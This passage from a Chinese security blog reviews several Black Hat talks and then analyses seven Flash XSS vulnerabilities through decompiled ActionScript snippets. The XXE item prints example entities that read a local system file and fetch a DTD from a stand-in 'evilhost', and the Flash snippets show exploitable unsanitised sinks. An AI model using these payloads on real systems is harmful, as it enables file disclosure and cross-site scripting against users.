比较有趣的一个议题,主要讲述如何攻击语音会议系统,介绍了root提权以及远程调试的一些技巧,最后演示了一个后门shell。对这些不是很了解,有兴趣的自己看文档。

6、《Hardening your Windows 8 apps for the Windows Store》

很水,不解释

7、《Harnessing GP²Us Building Better Browser Based Botnets》

觉得这议题有点在玩概念,实际攻击场景或者实战的东西很少,太理论化了。GPU现在很多被用在暴力破解方面,比如跑MD5、跑WPA-PSK,速度比CPU快得N多,比五速鞋还五速鞋……该议题主要讲构造基于浏览器的僵尸网络botnet,利用WEB漏洞(如XSS,并提到利用html5的WEB存储特性、插件等等方法实现永久XSS)来执行代码,再用GPU跑数据,然后利用C&C服务器进行通讯。

8、《LET’S PLAY - APPLANTING》

很水,为什么这种也能上BH大会讲呢

9、《MULTIPLAYER ONLINE GAMES INSECURITY》

讲游戏漏洞相关的,主要涉及协议分析、常见客户端漏洞攻击等,没什么新鲜的东西,爱看不看。

10、《Next generation mobile rootkits》

相对比较前沿的东西,主要讲arm平台上的rookit设计,但PPT写得太简洁了,简单一些文本描述,很难完全理解其中意思。之前viaForensics也写一篇关于android rootkit的文档《Dude,where’s my droid?!》,发表于RootedCON 2013安全大会,推荐阅读。

11、《POWER ANALYSIS ATTACKS FOR CHEAPSKATES》

可能一些搞硬件hacking或者移动安全的朋友会感兴趣,应该属于边信道攻击一类,玩这种都需要花钱买设备,所以搞这些的一般都是高富帅,像kevin2600一样。

12、《XML Out-Of-Band Data Retrieval》

这种XML实体注入漏洞,在2011年的时候,80sec就有写过一篇文章提到《XML实体注入漏洞安全警告》http://www.80sec.com/xml-entity-injection.html,比如可用于读取文件,加载远程页面:

1
2
<!ENTITY % payload SYSTEM "file:///c:/boot.ini">
<!ENTITY % remote SYSTEM "http://evilhost/evil.xml">

漏洞实例见《zend framework文件读取漏洞分析》:http://zone.wooyun.org/content/508 ,不过最早是在2002年的时候老外就有提出过这个问题。

13、《Advanced iOS Application Pentesting》

看标题冒似很“高级”的样子,实则就介绍下ios的一些逆向工具和ios编程中用到的一些类而已,还是爱看不看。

14、《APPLICATION DEVELOPMENT SECURE CODING WORKSHOP》

主要讲WEB开发中安全编程,但主要就是在普及WEB安全漏洞的原理、防御等,包括XSS、注入、CSRF等等,算是总结性文章,没有新货,有兴趣的自个翻看下。

15、《Assessing BYOD with the Smarthpone Pentest Framework》

作者公布了一款智能机渗透测试框架——Smartphone Pentest Framework v0.1.5,包括一些浏览器漏洞、客户端漏洞、社会工程学漏洞以及本地提权等,利用漏洞获取shell后还可发送短信、获取通信录、短信、下载上传文件等,有些功能还是不错的,但漏洞利用方法相对单一,有其利用的局限性。该工具下载地址:
https://github.com/georgiaw/Smartphone-Pentest-Framework

若干flash xss漏洞分析

漏洞一

1
2
3
4
5
6
7
8
9
Parameters.getInstance().data = loaderInfo.parameters;

public function get onPlayStart():String{
return (_data["onPlayStart"]);
}

ExternalInterface.call(Parameters.getInstance().onPlayStart, _arg1);
ExternalInterface.call(Parameters.getInstance().onPlayStop);
ExternalInterface.call(Parameters.getInstance().onFileLoadedError);

漏洞二

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
function reload(u, show_loading) {

if (show_loading == undefined) {
show_loading = true;
}

if (show_loading) {
_root.loading = new Loading("Loading data...");
}

var _local2 = "";

if (_root.data != undefined) {
_local2 = _root.data;
}

if (u != undefined) {
if (u.length > 0) {
_local2 = u;
}
}

_root.lv = undefined;
_root.lv = new LoadVars();
_root.lv.onLoad = LoadVarsOnLoad;
_root.lv.make_chart = make_chart;
_root.lv.make_pie = make_pie;
_root.lv.load(_local2);
}

漏洞三

1
2
var csPreloader;
loader.loadClip(csPreloader, preloader_mc.target);

漏洞四

1
2
3
4
this.loadXML(file);
function init(file, ploader, bookmark, contentpath)
container.init(csConfigFile, preloader_mc, csFilesetBookmark, contentpath);
var csConfigFile;

漏洞五

1
2
3
4
5
6
7
8
9
10
11
12
13
    getURL(_loc2, this.playList.currentClip().getLinkWindow());
var _loc2 = this.playList.currentClip().getLinkURL();

_loc1.getLinkURL = function ()
{
return (this.linkUrl);
};

var _loc1 = (_global.org.flowplayer.playlist.Clip = function (name, baseUrl, fileName, start, end, protected, enableControl, linkUrl, linkWindow, type, allowResize, overlayFileName, overlayId, live, showOnLoadBegin, maxPlayCount, info, thumbnailUrl, suggestedClipsInfoUrl, id, keywords)

{
this.linkUrl = linkUrl;

漏洞六

1
2
3
4
5
6
7
8
9
10
     this.textField.htmlText = ['', content, ''].join('');

_global.sIFR = function (textField, content)
{ ……
this.write(content);
……
}

sIFR.instance = new sIFR(_loc3.txtF, _loc4);
_loc4 = sIFR.VERSION_WARNING.split("%s").join(_root.version);

漏洞七

1
2
this._setVar("_onClick", [_root.onclick, pConfig.onclick], "String");
getURL(this._onClick, this._onClickTarget);

自动化检测脚本

顺手写了个简单的检测已知漏洞的flash xss检测脚本,下载地址见 FlashScanner